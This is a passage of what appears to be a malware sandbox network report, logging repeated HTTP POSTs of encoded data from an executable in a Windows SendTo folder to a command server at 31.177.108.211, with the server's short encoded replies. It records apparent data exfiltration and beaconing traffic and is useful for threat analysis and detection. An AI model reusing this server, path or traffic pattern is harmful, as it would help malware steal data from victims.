                                          Sep 13, 2024 21:03:06.175892115 CEST2108OUTData Raw: 5e 53 43 5f 55 45 5c 51 59 5f 51 51 52 58 54 56 5a 5d 5a 5e 55 52 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^SC_UE\QY_QQRXTVZ]Z^URSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9E*/*X !"40*(;9?,=>;;+,*X37%42?Y%+9[&!^-'
                                          Sep 13, 2024 21:03:06.556216955 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:06.684621096 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0f 3f 25 20 09 25 38 28 0c 2e 2d 0f 09 27 06 38 5b 3c 33 03 0a 3f 13 20 1e 2d 04 32 59 27 05 00 00 25 3c 0a 05 27 11 09 19 3d 3a 2e 46 0d 1d 26 01 3f 2c 20 1f 28 2d 20 13 26 3d 22 05 20 33 23 5d 33 01 06 0c 37 02 31 02 37 31 3f 57 25 14 29 5c 2f 36 22 5a 3d 31 3d 03 20 26 2e 55 0f 15 39 14 32 31 29 0f 2b 32 06 02 2a 3f 36 1c 26 2f 01 1c 31 3b 02 51 33 3b 32 57 32 3f 04 02 27 22 2c 04 3c 13 0b 53 22 0f 00 14 35 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:?% %8(.-'8[<3? -2Y'%<'=:.F&?, (- &=" 3#]37171?W%)\/6"Z=1= &.U921)+2*?6&/1;Q3;2W2?'",<S"5;'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          36192.168.2.45670531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:05.851211071 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:06.207284927 CEST2532OUTData Raw: 5b 55 43 50 55 46 5c 57 59 5f 51 51 52 5f 54 5a 5a 5d 5a 5a 55 5f 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UCPUF\WY_QQR_TZZ]ZZU_SEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9( 2%^"3%X=+%("*'+%#'&:B&?^%9[&!^-;
                                          Sep 13, 2024 21:03:06.586021900 CEST25INHTTP/1.1 100 Continue


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          37192.168.2.45670631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:06.898370028 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:07.260111094 CEST2532OUTData Raw: 5b 5f 43 51 50 46 59 5c 59 5f 51 51 52 5e 54 57 5a 5e 5a 5a 55 50 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CQPFY\Y_QQR^TWZ^ZZUPSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9E?/:46 U>>*U<Y*)7),=3U(&\8$?$Z'+9[&!^-
                                          Sep 13, 2024 21:03:07.680075884 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:07.854856968 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          38192.168.2.45670731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:07.984697104 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:08.332194090 CEST2532OUTData Raw: 5e 51 46 51 55 46 5c 50 59 5f 51 51 52 5a 54 55 5a 5f 5a 5b 55 50 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QFQUF\PY_QQRZTUZ_Z[UPSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<<6Y %\7#=.S=<">( Q<]'#/%9+C2&+9[&!^-/
                                          Sep 13, 2024 21:03:08.750447035 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:08.884655952 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          39192.168.2.45670831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:09.016480923 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:09.363411903 CEST2532OUTData Raw: 5b 50 43 51 55 41 59 5d 59 5f 51 51 52 5a 54 55 5a 52 5a 5f 55 53 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCQUAY]Y_QQRZTUZRZ_USSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<<-#%^73*+"U</>+;(+*Y'U+%9'C&<Z&9[&!^-/
                                          Sep 13, 2024 21:03:09.766700983 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:09.924606085 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          40192.168.2.45670931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:10.087774038 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:10.441704035 CEST2532OUTData Raw: 5b 52 46 55 55 43 5c 57 59 5f 51 51 52 5b 54 51 5a 53 5a 5c 55 52 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RFUUC\WY_QQR[TQZSZ\URSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?\#"1X :=+1();#),'#<T1)#% [%;9[&!^-+
                                          Sep 13, 2024 21:03:10.847594976 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:11.000494957 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          41192.168.2.45671031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:11.133155107 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:11.488446951 CEST2528OUTData Raw: 5e 56 46 52 55 4a 59 51 59 5f 51 51 52 59 54 55 5a 5f 5a 5d 55 51 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFRUJYQY_QQRYTUZ_Z]UQSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(5!2:70"*+.V<-_=;7(&'34P1*<%/819[&!^-;


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          42192.168.2.45671131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:11.698117018 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2092
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:12.052371025 CEST2092OUTData Raw: 5b 50 43 51 55 4b 59 53 59 5f 51 51 52 59 54 57 5a 58 5a 5b 55 51 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCQUKYSY_QQRYTWZXZ[UQSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+?6\7T%_"#Z>;&S<?"*<(,9$ &*4&Y4^&9[&!^-3
                                          Sep 13, 2024 21:03:12.437541008 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:12.568710089 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 56 2b 40 23 56 25 2b 30 0a 2f 13 0f 0e 24 11 3c 11 2b 33 35 42 3c 3e 27 02 2d 14 0c 10 24 15 3e 03 27 05 2b 10 27 11 33 50 2a 2a 2e 46 0d 1d 26 01 3e 2f 0e 10 3e 07 3c 58 24 2e 22 06 20 56 2b 5a 24 3f 3b 54 37 3c 0f 05 34 0c 30 0e 26 39 3d 5d 2d 35 03 02 29 08 26 58 23 36 2e 55 0f 15 39 14 26 0f 29 0c 3c 32 0e 03 29 59 22 57 25 2f 2f 1e 31 05 06 51 30 38 3e 52 26 59 35 58 25 31 3b 5c 28 13 0f 1d 22 57 26 14 23 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989V+@#V%+0/$<+35B<>'-$>'+'3P**.F&>/><X$." V+Z$?;T7<40&9=]-5)&X#6.U9&)<2)Y"W%//1Q08>R&Y5X%1;\("W&#+'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          43192.168.2.45671231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:11.819670916 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:12.179837942 CEST2532OUTData Raw: 5e 54 46 51 50 47 59 50 59 5f 51 51 52 5d 54 53 5a 5b 5a 5d 55 5f 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFQPGYPY_QQR]TSZ[Z]U_SEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+&X 673=(*W<"+;4V<<&%0(24229[&!^-3
                                          Sep 13, 2024 21:03:12.580866098 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:12.749082088 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          44192.168.2.45671331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:12.918162107 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2520
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:13.269975901 CEST2520OUTData Raw: 5b 54 46 51 50 46 59 54 59 5f 51 51 52 59 54 53 5a 52 5a 5f 55 50 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFQPFYTY_QQRYTSZRZ_UPSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C(/71!\#:*(.T+)??<0#$97A2?+29[&!^-
                                          Sep 13, 2024 21:03:13.649657965 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:13.776314020 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          45192.168.2.45671431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:13.923214912 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:14.270070076 CEST2532OUTData Raw: 5b 52 43 52 55 4b 59 5d 59 5f 51 51 52 5b 54 54 5a 5b 5a 5b 55 53 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCRUKY]Y_QQR[TTZ[Z[USSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<<:[!1%^40)Z)(,)Y*+6% ,29$2+';9[&!^-+
                                          Sep 13, 2024 21:03:14.669158936 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:14.821662903 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          46192.168.2.45671531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:15.256256104 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:15.613992929 CEST2532OUTData Raw: 5e 51 46 54 55 46 5c 52 59 5f 51 51 52 5e 54 57 5a 5a 5a 5f 55 52 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QFTUF\RY_QQR^TWZZZ_URSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B*/57%" =>;.(<%=;<,&\'U?242?7';9[&!^-
                                          Sep 13, 2024 21:03:15.999147892 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:16.152424097 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          47192.168.2.45671631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:16.296906948 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
